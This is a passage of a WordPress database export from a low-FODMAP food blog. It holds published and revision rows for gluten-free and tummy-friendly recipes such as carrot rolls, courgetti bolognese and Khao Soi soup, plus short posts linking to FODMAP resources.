The low FODMAP diet has come to the UK!  Initially developed by The Monash University, in Australia - it has now been adapted by King\'s College London and been implemented in a few London hospitals.  

\n\n\n\n

Check out this link for more information on the FODMAP diet:

\n\n\n\n
\nhttps://www.kcl.ac.uk/lsm/research/divisions/dns/projects/fodmaps/faq.aspx\n
\n','KCL and the FODMAP diet','','publish','open','open','','kcl-and-the-fodmap-diet','','','2020-04-23 08:56:37','2020-04-23 08:56:37','',0,'http://tummyrevolution.com/?p=4765',0,'post','',0),(4766,1,'2020-04-05 20:49:16','2020-04-05 20:49:16','\n

‘The gut is no longer seen as an entity with the sole purpose of helping with all aspects of digestion. It’s also being considered as a key player in regulating inflammation and immunity.’

\n\n\n\n
\nhttps://www.mindful.org/meet-your-second-brain-the-gut/\n
\n\n\n\n

This informative and insightful article, further convinces us of the importance of the revolutionary FODMAP diet.  A low FODMAP diet improves IBS symptoms and other gastrointestinal disorders. 

\n\n\n\n

At Tummy Revolution, we also recognise and respect this \'whole-body approach to healthcare and wellness.\'  Yoga plays a big part in our lives and alond with the FODMAP diet has really helped to tame our tummies.  We love working with Kerry, a fantastic yoga teacher,  

\n\n\n\n
\nhttp://www.yogawithkerry.com/\n
\n','Your Second Brain: The Gut','','private','open','open','','your-second-brain-the-gut','','','2020-04-27 10:52:45','2020-04-27 10:52:45','',0,'http://tummyrevolution.com/?p=4766',0,'post','',0),(4767,1,'2020-04-05 20:48:45','2020-04-05 20:48:45','\n

Great news!

\n\n\n\n

The low FODMAP diet has come to the UK!  Initially developed by The Monash University, in Australia - it has now been adapted by King\'s College London and been implemented in a few London hospitals.  

\n\n\n\n

Check out this link for more information on the FODMAP diet:

\n\n\n\n
\nhttps://www.kcl.ac.uk/lsm/research/divisions/dns/projects/fodmaps/faq.aspx\n
\n','KCL and the FODMAP diet','','inherit','closed','closed','','4765-revision-v1','','','2020-04-05 20:48:45','2020-04-05 20:48:45','',4765,'http://tummyrevolution.com/4765-revision-v1/',0,'revision','',0),(4768,1,'2020-04-05 20:49:30','2020-04-05 20:49:30','\n

Nothing beats home made bread and these gluten free Carrot Rolls are so delicious - especially when fresh out of the oven. Don\'t they just look great? We are sure that you\'ll love them :)

\n\n\n\n

Serve them with a tummy friendly topping such as butter, cheese and some fresh cut pepper or just as they come. 

\n\n\n\n

They are also ideal for freezing.  You can just get one or 2 out of the freezer as and when you need them.

\n\n\n\n
\"\"/
\n\n\n\n

Ingredients

\n\n\n\n
  • 6g dried yeast
  • 600ml almond milk, warm
  • 2 tbsp maple syrup
  • 2 tbsp olive oil
  • 1 tsp salt
  • 1 carrot finely grated
  • 30g oats
  • 2 tbsp Physillum husk
  • 250g buckwheat flour
  • pumpkin and/or sunflower seeds for decoration
\n\n\n\n

Method
1. Add the maple syrup, oil, salt, carrots, oats and buckwheat flour stir together to form a flour mixture

\n\n\n\n

2. Add the physillium husk and mix with an electric whisk or food processor for 7-10 minutes

\n\n\n\n

3. Leave the dough to rise under clingfilm for 45minutes

\n\n\n\n

4. Shape the dough into 15 rolls using floured hands

\n\n\n\n

5. Place them on a baking tray lined with parchment paper

\n\n\n\n

6. Brush the rolls with water and sprinkle over seeds for decoration

\n\n\n\n

7. Leave the breads to rise under a tea towel for 30 minutes and preheat the oven to 250°C

\n\n\n\n

8. Bake the bread rolls in the middle of an oven for 8-12 minutes then leave to cool on a wire rack.

\n\n\n\n
\"carrot
\n','Gluten Free Carrot Rolls','','publish','open','open','','gluten-free-carrot-rolls','','','2020-04-06 23:22:17','2020-04-06 23:22:17','',0,'http://tummyrevolution.com/?p=4768',0,'post','',0),(4769,1,'2020-04-05 20:49:16','2020-04-05 20:49:16','\n

‘The gut is no longer seen as an entity with the sole purpose of helping with all aspects of digestion. It’s also being considered as a key player in regulating inflammation and immunity.’

\n\n\n\n
\nhttps://www.mindful.org/meet-your-second-brain-the-gut/\n
\n\n\n\n

This informative and insightful article, further convinces us of the importance of the revolutionary FODMAP diet.  A low FODMAP diet improves IBS symptoms and other gastrointestinal disorders. 

\n\n\n\n

At Tummy Revolution, we also recognise and respect this \'whole-body approach to healthcare and wellness.\'  Yoga plays a big part in our lives and alond with the FODMAP diet has really helped to tame our tummies.  We love working with Kerry, a fantastic yoga teacher,  

\n\n\n\n
\nhttp://www.yogawithkerry.com/\n
\n','Your Second Brain: The Gut','','inherit','closed','closed','','4766-revision-v1','','','2020-04-05 20:49:16','2020-04-05 20:49:16','',4766,'http://tummyrevolution.com/4766-revision-v1/',0,'revision','',0),(4770,1,'2020-04-05 20:49:30','2020-04-05 20:49:30','\n

Nothing beats home made bread and these gluten free Carrot Rolls are so delicious - especially when fresh out of the oven. Don\'t they just look great? We are sure that you\'ll love them :)

\n\n\n\n

Serve them with a tummy friendly topping such as butter, cheese and some fresh cut pepper or just as they come. 

\n\n\n\n

They are also ideal for freezing.  You can just get one or 2 out of the freezer as and when you need them.

\n\n\n\n
\"\"/
\n\n\n\n

Ingredients

\n\n\n\n
  • 6g dried yeast
  • 600ml almond milk, warm
  • 2 tbsp maple syrup
  • 2 tbsp olive oil
  • 1 tsp salt
  • 1 carrot finely grated
  • 30g oats
  • 2 tbsp Physillum husk
  • 250g buckwheat flour
  • pumpkin and/or sunflower seeds for decoration
\n\n\n\n

Method
1. Add the maple syrup, oil, salt, carrots, oats and buckwheat flour stir together to form a flour mixture

\n\n\n\n

2. Add the physillium husk and mix with an electric whisk or food processor for 7-10 minutes

\n\n\n\n

3. Leave the dough to rise under clingfilm for 45minutes

\n\n\n\n

4. Shape the dough into 15 rolls using floured hands

\n\n\n\n

5. Place them on a baking tray lined with parchment paper

\n\n\n\n

6. Brush the rolls with water and sprinkle over seeds for decoration

\n\n\n\n

7. Leave the breads to rise under a tea towel for 30 minutes and preheat the oven to 250°C

\n\n\n\n

8. Bake the bread rolls in the middle of an oven for 8-12 minutes then leave to cool on a wire rack.

\n\n\n\n
\"carrot
\n','Gluten Free Carrot Rolls','','inherit','closed','closed','','4768-revision-v1','','','2020-04-05 20:49:30','2020-04-05 20:49:30','',4768,'http://tummyrevolution.com/4768-revision-v1/',0,'revision','',0),(4771,1,'2020-04-05 20:50:32','2020-04-05 20:50:32','\n

A tasty, yet light and healthy meal full of delicious flavour.  It also requires only a few ingredients and little preparation time.  

\n\n\n\n

Ingredients (serves 1)

\n\n\n\n

1 chicken breast

\n\n\n\n

4 cherry tomatoes

\n\n\n\n

Handful of spinach

\n\n\n\n

Small chunk of cheese (we used mature cheddar)

\n\n\n\n

½ tsp fry oregano

\n\n\n\n

1tbsp of garlic infused oil

\n\n\n\n

Pinch of salt and pepper

\n\n\n\n

Method

\n\n\n\n
  1. Chop the tomatoes in half
  2. Put the oil, oregano, salt, and pepper into a bowl and give it a stir
  3. Add the spinach and tomatoes and leave it to the side to let infuse
  4. Meanwhile, flatten your chicken with a rolling pin (or equivalent)
  5. Then, place your mixture into the middle of your chicken breast
  6. Fold in either side of your meat and secure with a cocktail stick
\n\n\n\n

We might serve this with a side of mash or new potatoes.

\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n','Herb Infused Chicken Parcels','','publish','open','open','','herb-infused-chicken-parcels','','','2020-04-06 23:21:58','2020-04-06 23:21:58','',0,'http://tummyrevolution.com/?p=4771',0,'post','',0),(4772,1,'2020-04-05 20:50:48','2020-04-05 20:50:48','\n

So simple and so tasty!  You can use fresh blueberries but we prefer using frozen blueberries as it really brings out the colour in the fruit. 

\n\n\n\n

Ingredients

\n\n\n\n

100g blueberries

\n\n\n\n

200g oats

\n\n\n\n

2tbsp peanut butter

\n\n\n\n

Desiccated coconut/raw cacao/chopped nuts (optional topping)

\n\n\n\n

Method

\n\n\n\n
  1. Put all of the ingredients (except the toppings!) into a blender
  2. Mix until blended
  3. Roll mixture into balls
  4. Roll in topping of choice, if you wish
\n\n\n\n

Keep these little bites in the fridge! Enjoy!

\n\n\n\n
\"\"/
\n','Blueberry Energy Balls','','publish','open','open','','blueberry-energy-balls','','','2020-04-06 23:21:40','2020-04-06 23:21:40','',0,'http://tummyrevolution.com/?p=4772',0,'post','',0),(4773,1,'2020-04-05 20:50:32','2020-04-05 20:50:32','\n

A tasty, yet light and healthy meal full of delicious flavour.  It also requires only a few ingredients and little preparation time.  

\n\n\n\n

Ingredients (serves 1)

\n\n\n\n

1 chicken breast

\n\n\n\n

4 cherry tomatoes

\n\n\n\n

Handful of spinach

\n\n\n\n

Small chunk of cheese (we used mature cheddar)

\n\n\n\n

½ tsp fry oregano

\n\n\n\n

1tbsp of garlic infused oil

\n\n\n\n

Pinch of salt and pepper

\n\n\n\n

Method

\n\n\n\n
  1. Chop the tomatoes in half
  2. Put the oil, oregano, salt, and pepper into a bowl and give it a stir
  3. Add the spinach and tomatoes and leave it to the side to let infuse
  4. Meanwhile, flatten your chicken with a rolling pin (or equivalent)
  5. Then, place your mixture into the middle of your chicken breast
  6. Fold in either side of your meat and secure with a cocktail stick
\n\n\n\n

We might serve this with a side of mash or new potatoes.

\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n','Herb Infused Chicken Parcels','','inherit','closed','closed','','4771-revision-v1','','','2020-04-05 20:50:32','2020-04-05 20:50:32','',4771,'http://tummyrevolution.com/4771-revision-v1/',0,'revision','',0),(4774,1,'2020-04-05 20:50:48','2020-04-05 20:50:48','\n

So simple and so tasty!  You can use fresh blueberries but we prefer using frozen blueberries as it really brings out the colour in the fruit. 

\n\n\n\n

Ingredients

\n\n\n\n

100g blueberries

\n\n\n\n

200g oats

\n\n\n\n

2tbsp peanut butter

\n\n\n\n

Desiccated coconut/raw cacao/chopped nuts (optional topping)

\n\n\n\n

Method

\n\n\n\n
  1. Put all of the ingredients (except the toppings!) into a blender
  2. Mix until blended
  3. Roll mixture into balls
  4. Roll in topping of choice, if you wish
\n\n\n\n

Keep these little bites in the fridge! Enjoy!

\n\n\n\n
\"\"/
\n','Blueberry Energy Balls','','inherit','closed','closed','','4772-revision-v1','','','2020-04-05 20:50:48','2020-04-05 20:50:48','',4772,'http://tummyrevolution.com/4772-revision-v1/',0,'revision','',0),(4775,1,'2020-04-05 20:51:41','2020-04-05 20:51:41','\n

As mentioned on IG, these turned out very well indeed!  We just had to bake them again ;) to make sure we had the ingredients just right... They are great for a quick breakfast, a snack with a cup of tea or something sweet after a meal.  We like to put them in our kids lunch boxes - full of healthy goodness but they taste naughty, so the little ones are none the wiser!

\n\n\n\n

Ingredients

\n\n\n\n

200g oats

\n\n\n\n

200g raspberries

\n\n\n\n

2tbsp maple syrup

\n\n\n\n

1 tsp cinnamon

\n\n\n\n

200ml almond milk

\n\n\n\n

2 bananas

\n\n\n\n

2tbsp peanut butter

\n\n\n\n

Method

\n\n\n\n

1. Preheat the oven to 180C.

\n\n\n\n

2. Put all ingredients into a blender.

\n\n\n\n

3. Mix, until smooth.

\n\n\n\n

4. Pour the mix into a baking tray.

\n\n\n\n

5. Put into the oven for about 40 minutes or until golden.

\n\n\n\n

6. Remove from the oven and allow to cool until slicing.

\n\n\n\n

N.B. Store in an air tight container.

\n\n\n\n
\"\"/
\n','Raspberry Slices','','publish','open','open','','raspberry-slices','','','2020-04-06 23:32:39','2020-04-06 23:32:39','',0,'http://tummyrevolution.com/?p=4775',0,'post','',0),(4776,1,'2020-04-05 20:51:31','2020-04-05 20:51:31','\n

So, we have been brave and ventured away from the traditional spaghetti bolognese recipe - but trust us - we think we\'re onto something here!

\n\n\n\n

For us, we just love a bowl of warming spaghetti, tasty bolognese sauce, sprinkled with Parmesan cheese, on a cold winter\'s evening.  However, we wanted to make this a meal for all seasons.  Not only that - but a meal for all diets.  This bolognese is: gluten free, FODMAP free, wheat free, dairy free (if you substitute the Parmesan ;) and so on...  Not only is it suitable for the majority - it is also lighter on the waistline too! A real winner - don\'t you agree?

\n\n\n\n

Not to overwhelm you but by adding just a few more ingredients you can also turn this into a chill con carne!  But we\'ll get to that in a few weeks...

\n\n\n\n

Ingredients (serves 4)

\n\n\n\n

2 tbsp garlic infused olive oil

\n\n\n\n

400g chopped tomatoes

\n\n\n\n

1 red pepper (diced)

\n\n\n\n

3/4 spring onions, green part only (chopped) 

\n\n\n\n

400g beef mince (ideally lean, grass fed)

\n\n\n\n

2 tbsp tomato purée 

\n\n\n\n

4/5 basil leaves 

\n\n\n\n

A pinch of salt and pepper 

\n\n\n\n

2 large courgettes 

\n\n\n\n

Parmesan (optional)

\n\n\n\n

Method

\n\n\n\n

1. Heat 1 tbsp garlic infused oil in a pan, on a medium heat.

\n\n\n\n

2. Add the spring onions and cook for 2/3 minutes, until softened.

\n\n\n\n

3. Add the mince and cook until browned, stirring regularly so it separates and does not stick together.

\n\n\n\n

4. Put in the diced peppers and cook for a further 4/5 minutes.

\n\n\n\n

5. Pour in the chopped tomatoes and add the purée, a pinch of salt and pepper and 3 of the bay leaves.

\n\n\n\n

6. Stir all the ingredients together and bring to the boil.

\n\n\n\n

7. Reduce to a low heat, cover and allow to cook for 30/40 minutes, stirring occasionally to ensure it does not stick to the bottom of the pan.

\n\n\n\n

8. Meanwhile, spriralise your courgettes.

\n\n\n\n

9. When your bolognese is ready, remove it from the heat. Season more (to your liking) and remove the bay leaves.

\n\n\n\n

10. Heat 1 tbsp of oil in a saucepan and add your courgetti. Cook this for a few minutes, tossing it often (N.B. Be sure to add the courgetti when the oil is very hot, so excess moisture is absorbed) You only want to cook it long enough to be heated and to brown slightly on the edges.

\n\n\n\n

11. Serve immediately, placing the fresh bay leaves on top for display.

\n','Courgetti Bolognese','','publish','open','open','','courgetti-bolognese','','','2020-04-06 23:21:27','2020-04-06 23:21:27','',0,'http://tummyrevolution.com/?p=4776',0,'post','',0),(4777,1,'2020-04-05 20:51:31','2020-04-05 20:51:31','\n

So, we have been brave and ventured away from the traditional spaghetti bolognese recipe - but trust us - we think we\'re onto something here!

\n\n\n\n

For us, we just love a bowl of warming spaghetti, tasty bolognese sauce, sprinkled with Parmesan cheese, on a cold winter\'s evening.  However, we wanted to make this a meal for all seasons.  Not only that - but a meal for all diets.  This bolognese is: gluten free, FODMAP free, wheat free, dairy free (if you substitute the Parmesan ;) and so on...  Not only is it suitable for the majority - it is also lighter on the waistline too! A real winner - don\'t you agree?

\n\n\n\n

Not to overwhelm you but by adding just a few more ingredients you can also turn this into a chill con carne!  But we\'ll get to that in a few weeks...

\n\n\n\n

Ingredients (serves 4)

\n\n\n\n

2 tbsp garlic infused olive oil

\n\n\n\n

400g chopped tomatoes

\n\n\n\n

1 red pepper (diced)

\n\n\n\n

3/4 spring onions, green part only (chopped) 

\n\n\n\n

400g beef mince (ideally lean, grass fed)

\n\n\n\n

2 tbsp tomato purée 

\n\n\n\n

4/5 basil leaves 

\n\n\n\n

A pinch of salt and pepper 

\n\n\n\n

2 large courgettes 

\n\n\n\n

Parmesan (optional)

\n\n\n\n

Method

\n\n\n\n

1. Heat 1 tbsp garlic infused oil in a pan, on a medium heat.

\n\n\n\n

2. Add the spring onions and cook for 2/3 minutes, until softened.

\n\n\n\n

3. Add the mince and cook until browned, stirring regularly so it separates and does not stick together.

\n\n\n\n

4. Put in the diced peppers and cook for a further 4/5 minutes.

\n\n\n\n

5. Pour in the chopped tomatoes and add the purée, a pinch of salt and pepper and 3 of the bay leaves.

\n\n\n\n

6. Stir all the ingredients together and bring to the boil.

\n\n\n\n

7. Reduce to a low heat, cover and allow to cook for 30/40 minutes, stirring occasionally to ensure it does not stick to the bottom of the pan.

\n\n\n\n

8. Meanwhile, spriralise your courgettes.

\n\n\n\n

9. When your bolognese is ready, remove it from the heat. Season more (to your liking) and remove the bay leaves.

\n\n\n\n

10. Heat 1 tbsp of oil in a saucepan and add your courgetti. Cook this for a few minutes, tossing it often (N.B. Be sure to add the courgetti when the oil is very hot, so excess moisture is absorbed) You only want to cook it long enough to be heated and to brown slightly on the edges.

\n\n\n\n

11. Serve immediately, placing the fresh bay leaves on top for display.

\n','Courgetti Bolognese','','inherit','closed','closed','','4776-revision-v1','','','2020-04-05 20:51:31','2020-04-05 20:51:31','',4776,'http://tummyrevolution.com/4776-revision-v1/',0,'revision','',0),(4778,1,'2020-04-05 20:51:41','2020-04-05 20:51:41','\n

As mentioned on IG, these turned out very well indeed!  We just had to bake them again ;) to make sure we had the ingredients just right... They are great for a quick breakfast, a snack with a cup of tea or something sweet after a meal.  We like to put them in our kids lunch boxes - full of healthy goodness but they taste naughty, so the little ones are none the wiser!

\n\n\n\n

Ingredients

\n\n\n\n

200g oats

\n\n\n\n

200g raspberries

\n\n\n\n

2tbsp maple syrup

\n\n\n\n

1 tsp cinnamon

\n\n\n\n

200ml almond milk

\n\n\n\n

2 bananas

\n\n\n\n

2tbsp peanut butter

\n\n\n\n

Method

\n\n\n\n

1. Preheat the oven to 180C.

\n\n\n\n

2. Put all ingredients into a blender.

\n\n\n\n

3. Mix, until smooth.

\n\n\n\n

4. Pour the mix into a baking tray.

\n\n\n\n

5. Put into the oven for about 40 minutes or until golden.

\n\n\n\n

6. Remove from the oven and allow to cool until slicing.

\n\n\n\n

N.B. Store in an air tight container.

\n\n\n\n
\"\"/
\n','Raspberry Slices','','inherit','closed','closed','','4775-revision-v1','','','2020-04-05 20:51:41','2020-04-05 20:51:41','',4775,'http://tummyrevolution.com/4775-revision-v1/',0,'revision','',0),(4779,1,'2020-04-05 20:51:59','2020-04-05 20:51:59','\n

There are just so many recipes that we can’t wait to try from https://www.lazycatkitchen.com  One recipe that jumped out at us straight away was this Khao Soi Soup, which is a classic Thai soup.  The fragrant curry spices and creamy coconut milk broth make this the perfect dinner when it’s cold outside. 

\n\n\n\n

In order to make it low FODMAP we had to adapt it slightly:

\n\n\n\n
  • Butternut squash for pumpkin
  • Shallots for spring onion
  • Garlic for garlic infused oil
  • Vegetable stock for homemade vegetable stock (without onion and garlic)
\n\n\n\n

We also made a few other changes that you will see in the recipe!

\n\n\n\n

Ingredients for the paste: (Serves 4)

\n\n\n\n

4 hot red chilies (de-seeded)

\n\n\n\n

4 tbsp garlic olive oil

\n\n\n\n

10 cm piece of ginger, peeled and sliced

\n\n\n\n

8 tbsp coriander stalks, chopped

\n\n\n\n

4 lemongrass stalks, white inner part only

\n\n\n\n

8 spring onions (green part only), chopped

\n\n\n\n

2 tbsp coriander seeds

\n\n\n\n

3 tsp turmeric

\n\n\n\n

2 tsp curry powder (N.B. Make sure we it is onion and garlic free if you want it to be tummy friendly)

\n\n\n\n

Other ingredients:

\n\n\n\n

Gluten free noodles (approx. 50g per person)

\n\n\n\n

½ head of broccoli divided into florets

\n\n\n\n

½ small pumpkin (approx. 2 cups cubed), peeled and sliced into cubes

\n\n\n\n

1 large handful of beansprouts

\n\n\n\n

2 tbsp garlic infused oil, for roasting the vegetables

\n\n\n\n

1500ml vegetable stock (preferably homemade, if you want it to be tummy friendly i.e made without onion and garlic)

\n\n\n\n

500ml full fat coconut milk

\n\n\n\n

2-3 tbsp fish sauce (or tamari or soy sauce)

\n\n\n\n

2 tbsp tamari or soy sauce (for roasting the veg)

\n\n\n\n

Juice of a lime

\n\n\n\n

3-4 tbsp maple syrup

\n\n\n\n

A handful of peanuts (very nice but optional)

\n\n\n\n

Fresh coriander, to serve 

\n\n\n\n

Method

\n\n\n\n

1. Preheat the oven to 200 degrees

\n\n\n\n

2. Place all the ingredients for the paste in a food processor or use a hand blender. Add 2-4 tbsp of water and mix until you get a smooth paste.

\n\n\n\n

3. Place the broccoli florets and the diced pumpkin on a large, lined baking tray. Sprinkle over about 2 tbsp of garlic infused oil and 2 tbsp soy sauce/tamari. Toss the vegetables in the oil and soy sauce and distribute them evenly on the baking tray. Bake in the oven for about 20-25 mins, until golden.

\n\n\n\n

4. Cook the noodles according to package instructions

\n\n\n\n

5. Heat up a tbsp of garlic infused olive oil in a medium sized saucepan. Add the paste and fry for about 5 minutes, until slightly darkened. Add the vegetable stock and coconut milk and bring to the boil. Season with tamari/soy sauce, fresh lime juice and maple syrup to taste. Bring the soup to boil and let it simmer for about 7 minutes.

\n\n\n\n

6. Place the noodles in soup bowls and pour over the soup. Add the roasted vegetables, beansprouts and peanuts. 

\n\n\n\n

7. Garnish with some fresh coriander and serve.

\n\n\n\n

Enjoy! I definitely did ;) 

\n\n\n\n
\"\"/
\n','Khao Soi Soup','','publish','open','open','','khao-soi-soup','','','2020-04-06 23:32:14','2020-04-06 23:32:14','',0,'http://tummyrevolution.com/?p=4779',0,'post','',0),(4780,1,'2020-04-05 20:52:15','2020-04-05 20:52:15','\n

Today we are making Nut Butter Cups - something we have wanted to try for a while now, so we are excited to get started!  Use which ever nut butter you\'d prefer - just make sure it is low FODMAP.  Here are some tummy friendly examples: chestnut, macadamia, brazil, peanut, pecan or walnut.  Obviously, not all of these nuts are widely available as butters in shops but if you have a particular favourite you can make your own nut butter.  Simply put your nuts into a food processor, until broken down - you can add a little coconut oil if you want a smoother texture.  We are going to use the standard - peanut butter :) We may be more adventurous next time but thought we\'d begin with the classic!  So, here it goes...

\n\n\n\n

Ingredients

\n\n\n\n

100g coconut oil

\n\n\n\n

50g raw cacao powder

\n\n\n\n

3tbsp maple syrup

\n\n\n\n

3tbsp coconut cream

\n\n\n\n

150g nut butter

\n\n\n\n

pinch of sea salt (optional)

\n\n\n\n

Method

\n\n\n\n

1. Combine the oil(liquid state) and powder and mix until they form a smooth consistency.

\n\n\n\n

2. Add the cream and the syrup and salt (optional).

\n\n\n\n

3. Pour a thin layer of the mixture into individual cupcake cases and put them all in the freezer for about 5-10 mins.

\n\n\n\n

4. The mixture should now be solid and you can then add a teaspoon of nut butter into the middle of each cupcake case. 

\n\n\n\n

5. Pour the remaining mixture over the nut butter.

\n\n\n\n

6. Refrigerate the cups until set.

\n\n\n\n

N.B. Keep these delicious treats cool - they will melt if left out too long! They will still taste good but may be a tad tricky to eat ;)

\n\n\n\n

Our Nut Cups are refined sugar free :)  If you would like a slightly sweeter taste you can replace the raw cacao powder for good quality cooking chocolate.

\n\n\n\n
\"\"/
\n','NUT BUTTER CUPS','','publish','open','open','','nut-butter-cups','','','2020-04-06 23:32:01','2020-04-06 23:32:01','',0,'http://tummyrevolution.com/?p=4780',0,'post','',0),(4781,1,'2020-04-05 20:51:59','2020-04-05 20:51:59','\n

There are just so many recipes that we can’t wait to try from https://www.lazycatkitchen.com  One recipe that jumped out at us straight away was this Khao Soi Soup, which is a classic Thai soup.  The fragrant curry spices and creamy coconut milk broth make this the perfect dinner when it’s cold outside. 

\n\n\n\n

In order to make it low FODMAP we had to adapt it slightly:

\n\n\n\n
  • Butternut squash for pumpkin
  • Shallots for spring onion
  • Garlic for garlic infused oil
  • Vegetable stock for homemade vegetable stock (without onion and garlic)
\n\n\n\n

We also made a few other changes that you will see in the recipe!

\n\n\n\n

Ingredients for the paste: (Serves 4)

\n\n\n\n

4 hot red chilies (de-seeded)

\n\n\n\n

4 tbsp garlic olive oil

\n\n\n\n

10 cm piece of ginger, peeled and sliced

\n\n\n\n

8 tbsp coriander stalks, chopped

\n\n\n\n

4 lemongrass stalks, white inner part only

\n\n\n\n

8 spring onions (green part only), chopped

\n\n\n\n

2 tbsp coriander seeds

\n\n\n\n

3 tsp turmeric

\n\n\n\n

2 tsp curry powder (N.B. Make sure we it is onion and garlic free if you want it to be tummy friendly)

\n\n\n\n

Other ingredients:

\n\n\n\n

Gluten free noodles (approx. 50g per person)

\n\n\n\n

½ head of broccoli divided into florets

\n\n\n\n

½ small pumpkin (approx. 2 cups cubed), peeled and sliced into cubes

\n\n\n\n

1 large handful of beansprouts

\n\n\n\n

2 tbsp garlic infused oil, for roasting the vegetables

\n\n\n\n

1500ml vegetable stock (preferably homemade, if you want it to be tummy friendly i.e made without onion and garlic)

\n\n\n\n

500ml full fat coconut milk

\n\n\n\n

2-3 tbsp fish sauce (or tamari or soy sauce)

\n\n\n\n

2 tbsp tamari or soy sauce (for roasting the veg)

\n\n\n\n

Juice of a lime

\n\n\n\n

3-4 tbsp maple syrup

\n\n\n\n

A handful of peanuts (very nice but optional)

\n\n\n\n

Fresh coriander, to serve 

\n\n\n\n

Method

\n\n\n\n

1. Preheat the oven to 200 degrees

\n\n\n\n

2. Place all the ingredients for the paste in a food processor or use a hand blender. Add 2-4 tbsp of water and mix until you get a smooth paste.

\n\n\n\n

3. Place the broccoli florets and the diced pumpkin on a large, lined baking tray. Sprinkle over about 2 tbsp of garlic infused oil and 2 tbsp soy sauce/tamari. Toss the vegetables in the oil and soy sauce and distribute them evenly on the baking tray. Bake in the oven for about 20-25 mins, until golden.

\n\n\n\n

4. Cook the noodles according to package instructions

\n\n\n\n

5. Heat up a tbsp of garlic infused olive oil in a medium sized saucepan. Add the paste and fry for about 5 minutes, until slightly darkened. Add the vegetable stock and coconut milk and bring to the boil. Season with tamari/soy sauce, fresh lime juice and maple syrup to taste. Bring the soup to boil and let it simmer for about 7 minutes.

\n\n\n\n

6. Place the noodles in soup bowls and pour over the soup. Add the roasted vegetables, beansprouts and peanuts. 

\n\n\n\n

7. Garnish with some fresh coriander and serve.

\n\n\n\n

Enjoy! I definitely did ;) 

\n\n\n\n
\"\"/
\n','Khao Soi Soup','','inherit','closed','closed','','4779-revision-v1','','','2020-04-05 20:51:59','2020-04-05 20:51:59','',4779,'http://tummyrevolution.com/4779-revision-v1/',0,'revision','',0),(4782,1,'2020-04-05 20:52:15','2020-04-05 20:52:15','\n

Today we are making Nut Butter Cups - something we have wanted to try for a while now, so we are excited to get started!  Use which ever nut butter you\'d prefer - just make sure it is low FODMAP.  Here are some tummy friendly examples: chestnut, macadamia, brazil, peanut, pecan or walnut.  Obviously, not all of these nuts are widely available as butters in shops but if you have a particular favourite you can make your own nut butter.  Simply put your nuts into a food processor, until broken down - you can add a little coconut oil if you want a smoother texture.  We are going to use the standard - peanut butter :) We may be more adventurous next time but thought we\'d begin with the classic!  So, here it goes...

\n\n\n\n

Ingredients

\n\n\n\n

100g coconut oil

\n\n\n\n

50g raw cacao powder

\n\n\n\n

3tbsp maple syrup

\n\n\n\n

3tbsp coconut cream

\n\n\n\n

150g nut butter

\n\n\n\n

pinch of sea salt (optional)

\n\n\n\n

Method

\n\n\n\n

1. Combine the oil(liquid state) and powder and mix until they form a smooth consistency.

\n\n\n\n

2. Add the cream and the syrup and salt (optional).

\n\n\n\n

3. Pour a thin layer of the mixture into individual cupcake cases and put them all in the freezer for about 5-10 mins.

\n\n\n\n

4. The mixture should now be solid and you can then add a teaspoon of nut butter into the middle of each cupcake case. 

\n\n\n\n

5. Pour the remaining mixture over the nut butter.

\n\n\n\n

6. Refrigerate the cups until set.

\n\n\n\n

N.B. Keep these delicious treats cool - they will melt if left out too long! They will still taste good but may be a tad tricky to eat ;)

\n\n\n\n

Our Nut Cups are refined sugar free :)  If you would like a slightly sweeter taste you can replace the raw cacao powder for good quality cooking chocolate.

\n\n\n\n
\"\"/
\n','NUT BUTTER CUPS','','inherit','closed','closed','','4780-revision-v1','','','2020-04-05 20:52:15','2020-04-05 20:52:15','',4780,'http://tummyrevolution.com/4780-revision-v1/',0,'revision','',0),(4783,1,'2020-04-05 20:52:38','2020-04-05 20:52:38','\n

Courgettes are quickly becoming one of our favourite vegetables.  So, when we saw this recipe, on the I Quit Sugar website, we just had to give it a go!  To make it low FODMAP, we had to make some changes.  Instead of using garlic cloves we have used garlic infused olive oil and we have replaced the flour for gluten free flour. Oh – and we went for cheddar instead of Parmesan!  Once the ingredient prep is complete, it is such a simple recipe. 

\n\n\n\n

IQS recommend serving it with a leafy salad, which we agree is a great idea for a light lunch option.  Or, you could have it on its own for breakfast.  You could even add some sautéed potatoes and tomato relish for dinner.  The options are endless…

\n\n\n\n

This slice lasts for up to 4 days in the fridge, so no need to shed a tear when your finish your first helping.  It also freezes well for up to one month.  Have a go and let us know what you think.  Next time we will try it with Parmesan - love cheese!

\n\n\n\n

Ingredients

\n\n\n\n

8 eggs

\n\n\n\n

2 handfuls of kale, destemmed and finely chopped

\n\n\n\n

150g mature cheddar, grated

\n\n\n\n

100g feta, crumbled

\n\n\n\n

8 thyme sprigs

\n\n\n\n

500g courgette, grated and drained of most of the moisture

\n\n\n\n

200g gluten free flour

\n\n\n\n

1 tsp garlic infused oil

\n\n\n\n

Salt

\n\n\n\n

Pepper

\n\n\n\n

Method 

\n\n\n\n
  1. Preheat the oven to 100C.
  2. In a bowl, whisk the eggs and then add the chopped kale, cheese, garlic infused oil, courgette and 4 sprigs of thyme.
  3. Then, add the flour and season with salt and pepper.
  4. Pour the ingredients into a lined baking dish and arrange the remaining sprigs and crumbled feta on top.
  5. Place in the oven for about 30 minutes, until cooked through and the top turns golden.
\n\n\n\n
\"\"/
\n','Courgette and Feta Slice','','publish','open','open','','courgette-and-feta-slice','','','2020-04-06 23:31:40','2020-04-06 23:31:40','',0,'http://tummyrevolution.com/?p=4783',0,'post','',0),(4784,1,'2020-04-05 20:53:41','2020-04-05 20:53:41','\n

So here is why Tummy Revolution all started...

\n\n\n\n
\"\"/
\n\n\n\n
\nhttp://www.med.monash.edu/cecs/gastro/fodmap/\n
\n','What is the low FODMAP diet?','','publish','open','open','','what-is-the-low-fodmap-diet-2','','','2020-04-05 20:53:44','2020-04-05 20:53:44','',0,'http://tummyrevolution.com/?p=4784',0,'post','',0),(4785,1,'2020-04-05 20:52:38','2020-04-05 20:52:38','\n

Courgettes are quickly becoming one of our favourite vegetables.  So, when we saw this recipe, on the I Quit Sugar website, we just had to give it a go!  To make it low FODMAP, we had to make some changes.  Instead of using garlic cloves we have used garlic infused olive oil and we have replaced the flour for gluten free flour. Oh – and we went for cheddar instead of Parmesan!  Once the ingredient prep is complete, it is such a simple recipe. 

\n\n\n\n

IQS recommend serving it with a leafy salad, which we agree is a great idea for a light lunch option.  Or, you could have it on its own for breakfast.  You could even add some sautéed potatoes and tomato relish for dinner.  The options are endless…

